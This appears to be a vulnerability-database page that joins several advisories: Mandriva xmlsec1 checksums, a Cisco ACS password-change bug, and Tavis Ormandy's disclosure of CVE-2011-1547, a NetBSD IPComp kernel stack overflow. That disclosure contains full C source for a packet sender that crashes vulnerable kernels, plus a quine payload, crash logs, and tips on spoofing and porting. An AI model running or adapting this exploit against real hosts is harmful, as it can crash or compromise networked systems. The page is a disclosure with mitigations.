2010.0/i586/libxmlsec1-nss-devel-1.2.13-1.2mdv2010.0.i586.rpm 21b46e66c6b78df3fbcd86064cf30e7c 2010.0/i586/libxmlsec1-openssl1-1.2.13-1.2mdv2010.0.i586.rpm 6620368f5cc3bcbb857b4a23eac3c8ca 2010.0/i586/libxmlsec1-openssl-devel-1.2.13-1.2mdv2010.0.i586.rpm c2ea73966298d29fdfdc34c7c2a2f1c2 2010.0/i586/xmlsec1-1.2.13-1.2mdv2010.0.i586.rpm 877a15d6552bedb5763df240f4d82d84 2010.0/SRPMS/xmlsec1-1.2.13-1.2mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: a62d421d4fd1899fbba01309dbaf1896 2010.0/x86_64/lib64xmlsec1-1-1.2.13-1.2mdv2010.0.x86_64.rpm 2f537e7a96421519da35174c233ce595 2010.0/x86_64/lib64xmlsec1-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 7a8b160fe2e6034be36f6eae79085ace 2010.0/x86_64/lib64xmlsec1-gnutls1-1.2.13-1.2mdv2010.0.x86_64.rpm 0a6294fd609fc0852648a497a88483c0 2010.0/x86_64/lib64xmlsec1-gnutls-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 29db3a07cccce7ad181397aad0cc8d0d 2010.0/x86_64/lib64xmlsec1-nss1-1.2.13-1.2mdv2010.0.x86_64.rpm fbbf15dc907548874aa56a0a60288c44 2010.0/x86_64/lib64xmlsec1-nss-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 91cde9b85b74ee50ca22063395776ad5 2010.0/x86_64/lib64xmlsec1-openssl1-1.2.13-1.2mdv2010.0.x86_64.rpm 48200b7dbaf54a0f3b773fe838bba047 2010.0/x86_64/lib64xmlsec1-openssl-devel-1.2.13-1.2mdv2010.0.x86_64.rpm 959b3952c7246d48878bd70d51966a8e 2010.0/x86_64/xmlsec1-1.2.13-1.2mdv2010.0.x86_64.rpm 877a15d6552bedb5763df240f4d82d84 2010.0/SRPMS/xmlsec1-1.2.13-1.2mdv2010.0.src.rpm Mandriva Enterprise Server 5: 319b4ab924dbbbf82f4614d148f14804 mes5/i586/libxmlsec1-1-1.2.10-7.3mdvmes5.2.i586.rpm 9278a1efe02a044e5ff7a1a37ffa36d4 mes5/i586/libxmlsec1-devel-1.2.10-7.3mdvmes5.2.i586.rpm cb993560c51e070393b7e2e0861900ff mes5/i586/libxmlsec1-gnutls1-1.2.10-7.3mdvmes5.2.i586.rpm 293f8773291935a45d76908db7825384 mes5/i586/libxmlsec1-gnutls-devel-1.2.10-7.3mdvmes5.2.i586.rpm aab3eb1ab4455876a2339e9863fa7935 mes5/i586/libxmlsec1-nss1-1.2.10-7.3mdvmes5.2.i586.rpm 2ff66c74e00e7dd79d6037162dde87b8 mes5/i586/libxmlsec1-nss-devel-1.2.10-7.3mdvmes5.2.i586.rpm f2f5866fd188473eb74e33c5b78c2d9a mes5/i586/libxmlsec1-openssl1-1.2.10-7.3mdvmes5.2.i586.rpm c41b9570228f06d39b91d87a8538728c mes5/i586/libxmlsec1-openssl-devel-1.2.10-7.3mdvmes5.2.i586.rpm 308bc571cc766753f0c07a44ca80181c mes5/i586/xmlsec1-1.2.10-7.3mdvmes5.2.i586.rpm d07141a9abde87df9f330093acd2d59f mes5/SRPMS/xmlsec1-1.2.10-7.3mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 327e47c32620609fd4245c32475938c7 mes5/x86_64/lib64xmlsec1-1-1.2.10-7.3mdvmes5.2.x86_64.rpm 033b408efc5436eb5d6e09a9582760a5 mes5/x86_64/lib64xmlsec1-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm 814d8c33a387f72d855f7bfc250f74e3 mes5/x86_64/lib64xmlsec1-gnutls1-1.2.10-7.3mdvmes5.2.x86_64.rpm 2883ed21f25132b542780bd1dfccfb17 mes5/x86_64/lib64xmlsec1-gnutls-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm 3409c185fdbcb57c45a1883752ade7c3 mes5/x86_64/lib64xmlsec1-nss1-1.2.10-7.3mdvmes5.2.x86_64.rpm f781e2d050e0c19945c783dc86745e08 mes5/x86_64/lib64xmlsec1-nss-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm cc9fc7fcd1d32d4877689486e424875e mes5/x86_64/lib64xmlsec1-openssl1-1.2.10-7.3mdvmes5.2.x86_64.rpm a5315ce478dda5fd0af55a1acf043288 mes5/x86_64/lib64xmlsec1-openssl-devel-1.2.10-7.3mdvmes5.2.x86_64.rpm 1a153d8d6af32724260f029205cd0a54 mes5/x86_64/xmlsec1-1.2.10-7.3mdvmes5.2.x86_64.rpm d07141a9abde87df9f330093acd2d59f mes5/SRPMS/xmlsec1-1.2.10-7.3mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFNmXaUmqjQ0CJFipgRAgs3AKCLIc162L+edW3LKFOx7G/U4GkynwCgpJ7j SEMdD/0Sj9XbDDepzFsOW3o= =Kuyv -----END PGP SIGNATURE-----

Multiple stack consumption vulnerabilities in the kernel in NetBSD 4.0, 5.0 before 5.0.3, and 5.1 before 5.1.1, when IPsec is enabled, allow remote attackers to cause a denial of service (memory corruption and panic) or possibly have unspecified other impact via a crafted (1) IPv4 or (2) IPv6 packet with nested IPComp headers. plural IPComp A memory corruption vulnerability exists in the receive processing of the implementation. IPComp (RFC 3173) Generally IPsec Used with the implementation of KAME Projects and NetBSD In projects, etc. IPComp and IPsec The code that implements the crafted IPComp A stack-based buffer overflow can occur when processing the payload. Attack code using this vulnerability has been released.Service disruption by a remote third party (DoS) An attacker may be able to attack or execute arbitrary code. NetBSD is prone to a remote memory-corruption vulnerability because it fails to adequately check for stack overflows in nested IP Payload Compression protocol (IPComp) payloads. Attackers can exploit this issue to trigger a kernel stack overflow, resulting in the execution of arbitrary code with superuser privileges. Failed attacks may cause a denial-of-service condition. A successful exploit will completely compromise affected computers. This issue may affect systems derived from NetBSD IPComp implementations. BSD derived RFC3173 IPComp encapsulation will expand arbitrarily nested payload ------------------------------------------------------------------------------- Gruezi, this document describes CVE-2011-1547. RFC3173 ip payload compression, henceforth ipcomp, is a protocol intended to provide compression of ip datagrams, and is commonly used alongside IPSec (although there is no requirement to do so). An ipcomp datagram consists of an ip header with ip->ip_p set to 108, followed by a 32 bit ipcomp header, described in C syntax below. struct ipcomp { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved uint16_t comp_cpi; // Compression Parameter Index }; The Compression Parameter Index indicates which compression algorithm was used to compress the ipcomp payload, which is expanded and then routed as requested. Although the CPI field is 16 bits wide, in reality only 1 algorithm is widely implemented, RFC1951 DEFLATE (cpi=2). It's well documented that ipcomp can be used to traverse perimeter filtering, however this document discusses potential implementation flaws observed in popular stacks. The IPComp implementation originating from NetBSD/KAME implements injection of unpacked payloads like so: algo = ipcomp_algorithm_lookup(cpi); /* ... */ error = (*algo->decompress)(m, m->m_next, &newlen); /* ... */ if (nxt != IPPROTO_DONE) { if ((inetsw[ip_protox[nxt]].pr_flags & PR_LASTHDR) != 0 && ipsec4_in_reject(m, NULL)) { IPSEC_STATINC(IPSEC_STAT_IN_POLVIO); goto fail; } (*inetsw[ip_protox[nxt]].pr_input)(m, off, nxt); } else m_freem(m); /* ... */ Where inetsw[] contains definitions for supported protocols, and nxt is a protocol number, usually associated with ip->ip_p (see http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml), but in this case from ipcomp->comp_nxt. m is the mbuf structure adjusted to point to the unpacked payload. The unpacked packet is dispatched to the appropriate protocol handler directly from the ipcomp protocol handler. The NetBSD/KAME network stack is used as basis for various other operating systems, such as Xnu, FTOS, various embedded devices and network appliances, and earlier versions of FreeBSD/OpenBSD (the code has since been refactored, but see the NOTES section regarding IPComp quines, which still permit remote, pre-authentication, single-packet, spoofed-source DoS in the latest versions). The Xnu port of this code is close to the original, where the decompressed payload is recursively injected back into the toplevel ip dispatcher. The implementation is otherwise similar, and some alterations to the testcase provided for NetBSD should make it work. This is left as an exercise for the interested reader. -------------------- Affected Software ------------------------ Any NetBSD derived IPComp/IPSec stack may be vulnerable (Xnu, FTOS, etc.). NetBSD is not distributed with IPSec support enabled by default, however Apple OSX and various other derivatives are. There are so many NetBSD derived network stacks that it is infeasible to check them all, concerned administrators are advised to check with their vendor if there is any doubt. Major vendors known to use network stacks derived from NetBSD were pre-notified about this vulnerability. If I missed you, it is either not well known that you use the BSD stack, you did not respond to security@ mail, or could not use pgp properly. Additionally, administrators of critical or major deployments of NetBSD (e.g. dns root servers) were given advance notice in order to deploy appropriate filter rules. Exploitability of kernel stack overflows will vary by platform (n.b. a stack overflow is not a stack buffer overflow, for a concise definition see TAOCP3,V1,S2.2.2). Also note that a kernel stack overflow is very different from a userland stack overflow. For further discussion, including attacks on other operating systems, see the notes section on ipcomp quines below. However, this is not a trivial task, and is highly platform dependent. I have verified kernel stack overflows on NetBSD are exploitable, I have looked at the source code for xnu and do not see any obvious obstacles to prevent exploitation (kernel stack segment limits, guard pages, etc. which would cause the worst impact to be limited to remote denial of service), so have no reason to believe it is different. Thoughts on this topic from fellow researchers would be welcome. Source code for a sample Linux program to reproduce this flaw on NetBSD is listed below. Please note, check if your system requires an IPv4 header in the compressed payload before attempting to adapt it to your needs. #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <arpa/inet.h> #include <unistd.h> #include <stdio.h> #include <zlib.h> #include <alloca.h> #include <stdbool.h> #include <stdlib.h> #include <string.h> // // BSD IPComp Kernel Stack Overflow Testcase // -- Tavis Ormandy <taviso@cmpxchg8b.com>, March 2011 // #define MAX_PACKET_SIZE (1024 * 1024 * 32) #define MAX_ENCAP_DEPTH 1024 enum { IPCOMP_OUI = 1, IPCOMP_DEFLATE = 2, IPCOMP_LZS = 3, IPCOMP_MAX, }; struct ipcomp { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved, must be zero uint16_t comp_cpi; // Compression parameter index uint8_t comp_data[0]; // Payload. }; bool ipcomp_encapsulate_data(void *data, size_t size, int nxt, struct ipcomp **out, size_t *length, int level) { struct ipcomp *ipcomp; z_stream zstream; ipcomp = malloc(MAX_PACKET_SIZE); *out = ipcomp; ipcomp->comp_nxt = nxt; ipcomp->comp_cpi = htons(IPCOMP_DEFLATE); ipcomp->comp_flags = 0; // Compress packet payload. zstream.zalloc = Z_NULL; zstream.zfree = Z_NULL; zstream.opaque = Z_NULL; if (deflateInit2(&zstream, level, Z_DEFLATED, -12, MAX_MEM_LEVEL, Z_DEFAULT_STRATEGY) != Z_OK) { fprintf(stderr, "error: failed to initialize zlib library\n"); return false; } zstream.avail_in = size; zstream.next_in = data; zstream.avail_out = MAX_PACKET_SIZE - sizeof(struct ipcomp); zstream.next_out = ipcomp->comp_data; if (deflate(&zstream, Z_FINISH) != Z_STREAM_END) { fprintf(stderr, "error: deflate() failed to create compressed payload, %s\n", zstream.msg); return false; } if (deflateEnd(&zstream) != Z_OK) { fprintf(stderr, "error: deflateEnd() returned failure, %s\n", zstream.msg); return false; } // Calculate size. *length = (MAX_PACKET_SIZE - sizeof(struct ipcomp)) - zstream.avail_out; ipcomp = realloc(ipcomp, *length); free(data); return true; } int main(int argc, char **argv) { int s; struct sockaddr_in sin = {0}; struct ipcomp *ipcomp = malloc(0); size_t length = 0; unsigned depth = 0; // Nest an ipcomp packet deeply without compression, this allows us to // create maximum redundancy. for (depth = 0; depth < MAX_ENCAP_DEPTH; depth++) { if (ipcomp_encapsulate_data(ipcomp, length, IPPROTO_COMP, &ipcomp, &length, Z_NO_COMPRESSION) != true) { fprintf(stderr, "error: failed to encapsulate data\n"); return 1; } } // Create a final outer packet with best compression, which should now // compress well due to Z_NO_COMPRESSION used in inner payloads. if (ipcomp_encapsulate_data(ipcomp, length, IPPROTO_COMP, &ipcomp, &length, Z_BEST_COMPRESSION) != true) { fprintf(stderr, "error: failed to encapsulate data\n"); return 1; } fprintf(stdout, "info: created %u nested ipcomp payload, %u bytes\n", depth, length); sin.sin_family = AF_INET; sin.sin_port = htons(0); sin.sin_addr.s_addr = inet_addr(argv[1]); if ((s = socket(PF_INET, SOCK_RAW, IPPROTO_COMP)) < 0) { fprintf(stderr, "error: failed to create socket, %m\n"); return 1; } if (sendto(s, ipcomp, length, MSG_NOSIGNAL, (const struct sockaddr *)(&sin), sizeof(sin)) != length) { fprintf(stderr, "error: send() returned failure, %m\n"); return 1; } fprintf(stdout, "info: success, packet sent to %s\n", argv[1]); free(ipcomp); return 0; } Packets of the following form are generated. Internet Protocol, Src: 192.168.1.1, Dst: 192.168.1.2 Version: 4 Header length: 20 bytes Differentiated Services Field: 0x04 (DSCP 0x01: Unknown DSCP; ECN: 0x00) 0000 01.. = Differentiated Services Codepoint: Unknown (0x01) .... ..0. = ECN-Capable Transport (ECT): 0 .... ...0 = ECN-CE: 0 Total Length: 205 Identification: 0xc733 (50995) Flags: 0x00 0.. = Reserved bit: Not Set .0. = Don't fragment: Not Set ..0 = More fragments: Not Set Fragment offset: 0 Time to live: 64 Protocol: IPComp (0x6c) Header checksum: 0x2e69 [correct] [Good: True] [Bad : False] Source: 192.168.1.1 Destination: 192.168.1.2 IP Payload Compression Next Header: IPComp (0x6c) IPComp Flags: 0x00 IPComp CPI: DEFLATE (0x0002) Data (181 bytes) Data: 73656158... [Length: 181] $ gcc ipcomp.c -lz -o ipcomp $ sudo ./ipcomp 192.168.1.2 info: created 1024 nested ipcomp payload, 2538 bytes info: success, packet sent to 192.168.1.2 Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0x1000, 1) -> 0xe Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c0633269 cs 8 eflags 10202 cr2 1335 ilevel 0 Mar 25 05:34:40 /netbsd: panic: trap Mar 25 05:34:40 /netbsd: Begin traceback... Mar 25 05:34:40 /netbsd: uvm_fault(0xca7bc774, 0, 1) -> 0xe Mar 25 05:34:40 /netbsd: fatal page fault in supervisor mode Mar 25 05:34:40 /netbsd: trap type 6 code 0 eip c06e6c90 cs 8 eflags 10246 cr2 8 ilevel 0 Mar 25 05:34:40 /netbsd: panic: trap Mar 25 05:34:40 /netbsd: Faulted in mid-traceback; aborting... Adjust depth as required. (gdb) bt #0 ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:112 #1 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #2 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #3 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #4 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #5 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #6 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 [ trimmed ] #148 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #149 0xc01ec302 in ipcomp4_input (m=0xc14e1300) at ../../../../netinet6/ipcomp_input.c:248 #150 0xc0162bbb in ip_input (m=0xc14e1300) at ../../../../netinet/ip_input.c:1059 #151 0xc0161b82 in ipintr () at ../../../../netinet/ip_input.c:476 #152 0xc05d6248 in softint_execute (si=0xca79e154, l=0xca7a7a00, s=4) at ../../../../kern/kern_softint.c:539 #153 0xc05d60e6 in softint_dispatch (pinned=0xca7a7500, s=4) at ../../../../kern/kern_softint.c:811 (gdb) info frame Stack level 0, frame at 0xcab9bf08: eip = 0xc01ebd5c in ipcomp4_input (../../../../netinet6/ipcomp_input.c:112); saved eip 0xc01ec302 called by frame at 0xcab9bfa8 source language c. Arglist at 0xcab9bf00, args: m=0xc14e1300 Locals at 0xcab9bf00, Previous frame's sp is 0xcab9bf08 Saved registers: ebx at 0xcab9bef8, ebp at 0xcab9bf00, esi at 0xcab9befc, eip at 0xcab9bf04 (gdb) info target Symbols from "netbsd.gdb". Remote serial target in gdb-specific protocol: Debugging a target over a serial line. Therefore, an oob sp will write attacker controlled data. (gdb) tb panic Temporary breakpoint 2, panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184 184 kpreempt_disable(); (gdb) bt #0 panic (fmt=0xc0acf54b "trap") at ../../../../kern/subr_prf.c:184 #1 0xc06f0919 in trap (frame=0xcac49f84) at ../../../../arch/i386/i386/trap.c:368 #2 0xc06f0566 in trap_tss (tss=0xc0cfe5ec, trapno=13, code=0) at ../../../../arch/i386/i386/trap.c:197 #3 0xc010cb1b in ?? () (gdb) frame 1 (gdb) info symbol frame->tf_eip etc. ------------------- Mitigation ----------------------- ******************************************************************************* * Please note, this document is intended for security professionals, network * * or systems administrators, and vendors of network equipment and software. * * End users need not be concerned. * ******************************************************************************* For numerous reasons, it is a good idea to filter IPComp at the perimeter if it is not expected. Even when implemented correctly, IPComp completely defeats the purpose of Delayed Compression in OpenSSH (see CAN-2005-2096 for an example of why you always want delayed compression). Additionally, the encapsulation means any attacks that require link-local access can simply be wrapped in ipcomp and are then routable (that is not good). Affected servers and devices can use packet filtering to prevent the vulnerable code from being exercised. On systems with ipfw, a rule based on the following ipfw/ipfw6 template can be used, adjust to whitelist expected peers as appropriate. # ipfw add deny proto ipcomp On other BSD systems, pfctl rules can be substituted. See vendor documentation for how to configure network appliances to deny IPComp at network boundaries. ------------------- Solution ----------------------- I would recommend vendors disallow nested encapulation of ipcomp payloads. The implementation of this fix will of course vary by product. By the time you read this advisory, a fix should have been committed to the NetBSD repository, downstream consumers of NetBSD code are advised to import the changes urgently. A draft patch from S.P.Zeidler of the NetBSD project is attached for reference. ------------------- Credit ----------------------- This bug was discovered by Tavis Ormandy. ------------------- Greetz ----------------------- Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, Asirap, Meder, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., djm, Brian C., djrbliss, jono, and all my other elite friends and colleagues. And of course, $1$kk1q85Xp$Id.gAcJOg7uelf36VQwJQ/. Additional thanks to Jan, Felix and Meder for their mad xnu skillz. Jan helps organize a security conference called #days held in Lucerne, Switzerland (a very picturesque Swiss city). The CFP is currently open, you should check it out at https://www.hashdays.ch/. ------------------- Notes ----------------------- An elegant method of reproducing this flaw would be using self-reproducing Lempel-Ziv programs, rsc describes the technique here: http://research.swtch.com/2010/03/zip-files-all-way-down.html This method would also be able to disrupt non-recursive implementations that do not prevent nested encapulation, such as modern FreeBSD and OpenBSD. An ipcomp quine is defined below in GNU C syntax below, and a testcase for Linux is attached to this mail. struct { uint8_t comp_nxt; // Next Header uint8_t comp_flags; // Reserved, must be zero uint16_t comp_cpi; // Compression parameter index uint8_t comp_data[180]; // Payload } ipcomp = { .comp_nxt = IPPROTO_COMP, .comp_flags = 0, .comp_cpi = htons(IPCOMP_DEFLATE), .comp_data = { 0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff, 0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff, 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff, 0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff } }; Note that modern FreeBSD and OpenBSD appear to drop incoming ipcomp packets if no TBD entries are known (see netstat -s -p ipcomp statistics, and the setkey documentation). You will have to allow for this while testing. Depending on implementation, You may also need to spoof the source address of a peer, see man 7 raw. Special thanks to rsc and Matthew Dempsky for hints and assistance. Something like this may be useful for testing: # setkey -c add 192.168.0.1 192.168.0.2 ipcomp 0002 -C deflate ^D - I would advise caution when sending malformed or pathological packets across critical infrastructure or the public internet, many embedded devices are based on BSD-derived code and may not handle the error gracefully. - Julien will be angry I didn't use scapy, sorry! I am a fan :-) - A bug in Xnu's custom allocator for zlib (deflate_alloc) causes zlib initialisation to fail if ~1k bytes is not available to MALLOC() with M_NOWAIT, even though M_WAITOK was intended, as described in the comments: /* * Avert your gaze, ugly hack follows! * We init here so our malloc can allocate using M_WAIT. * We don't want to allocate if ipcomp isn't used, and we * don't want to allocate on the input or output path. * Allocation fails if we use M_NOWAIT because init allocates * something like 256k (ouch). */ However with some creativity it is possible to make the allocation succeed. You can observe this bug by sending an ipcomp packet and looking for the memory allocation failure in the network statistics (try something like `netstat -s | grep -A16 ipsec:`). You can also set `sysctl -w net.inet.ipsec.debug=1`. ------------------- References ----------------------- - http://research.swtch.com/2010/03/zip-files-all-way-down.html research!rsc: Zip Files All The Way Down - http://tools.ietf.org/html/rfc3173 RFC3173: IP Payload Compression Protocol (IPComp) - http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?rev=1.36&content-type=text/x-cvsweb-markup&only_with_tag=MAIN NetBSD: ipcomp_input.c, v1.36 - http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/netinet6/ipcomp_input.c Xnu: ipcomp_input.c - http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/ipfw.8.html ipfw -- IP firewall and traffic shaper control program - http://www.netbsd.org/docs/network/pf.html The NetBSD Packet Filter (generally applies to other popular BSDs). - http://fxr.watson.org/fxr/source/netinet6/ipcomp_input.c?v=FREEBSD64#L222 Earlier versions of FreeBSD were implemented recursively, the code was since refactored. - http://fxr.watson.org/fxr/source/netipsec/xform_ipcomp.c?v=FREEBSD81#L299 The current version is implemented iteratively (see NOTES section on Quine DoS). - http://www.force10networks.com/products/ftos.asp FTOS - Force10 Operating System - http://www.qnx.com/developers/docs/6.4.1/io-pkt_en/user_guide/drivers.html QNX Network Drivers Documentation Support high-quality journalism in information security by subscribing to LWN http://lwn.net/ (i have no connection to lwn other than appreciating their work). I have a twitter account where I occasionally comment on security topics. http://twitter.com/taviso ex$$ -- ------------------------------------- taviso@cmpxchg8b.com | pgp encrypted mail preferred ------------------------------------------------------- . ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: NetBSD IPComp Payload Decompression Stack Overflow Vulnerability SECUNIA ADVISORY ID: SA43969 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43969/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43969 RELEASE DATE: 2011-04-01 DISCUSS ADVISORY: http://secunia.com/advisories/43969/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43969/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43969 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Tavis Ormandy has reported a vulnerability in NetBSD, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. SOLUTION: Fixed in the CVS repository. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: Tavis Ormandy ORIGINAL ADVISORY: http://www.openwall.com/lists/oss-security/2011/04/01/1 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The web-based management interface in Cisco Secure Access Control System (ACS) 5.1 before 5.1.0.44.6 and 5.2 before 5.2.0.26.3 allows remote attackers to change arbitrary user passwords via unspecified vectors, aka Bug ID CSCtl77440. The problem is Bug ID CSCtl77440 It is a problem.A third party may change the password of any user. This vulnerability cannot be used to change the type of user account: (1) An account defined on an external identity store such as a Lightweight Directory Access Protocol (LDAP) server, Microsoft Active Directory Server, RSA SecureID server, or external RADIUS server. This issue is being tracked by Cisco Bug ID CSCtl77440. An attacker can exploit this issue to change a user's password, thereby aiding in further attacks. ---------------------------------------------------------------------- Secunia Research and vulnerability disclosures coordinated by Secunia: http://secunia.com/research/ ---------------------------------------------------------------------- TITLE: Cisco Secure Access Control System Password Change Vulnerability SECUNIA ADVISORY ID: SA43924 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43924/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43924 RELEASE DATE: 2011-03-31 DISCUSS ADVISORY: http://secunia.com/advisories/43924/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/43924/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=43924 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Cisco Secure Access Control System, which can be exploited by malicious people to bypass certain security restrictions. SOLUTION: Apply patches. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: cisco-sa-20110330-acs: http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Successful exploitation requires the user account to be defined on the internal identity store. Cisco has released free software updates that address this vulnerability. There is no workaround for this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml. Affected Products ================= Vulnerable Products +------------------ The following Cisco 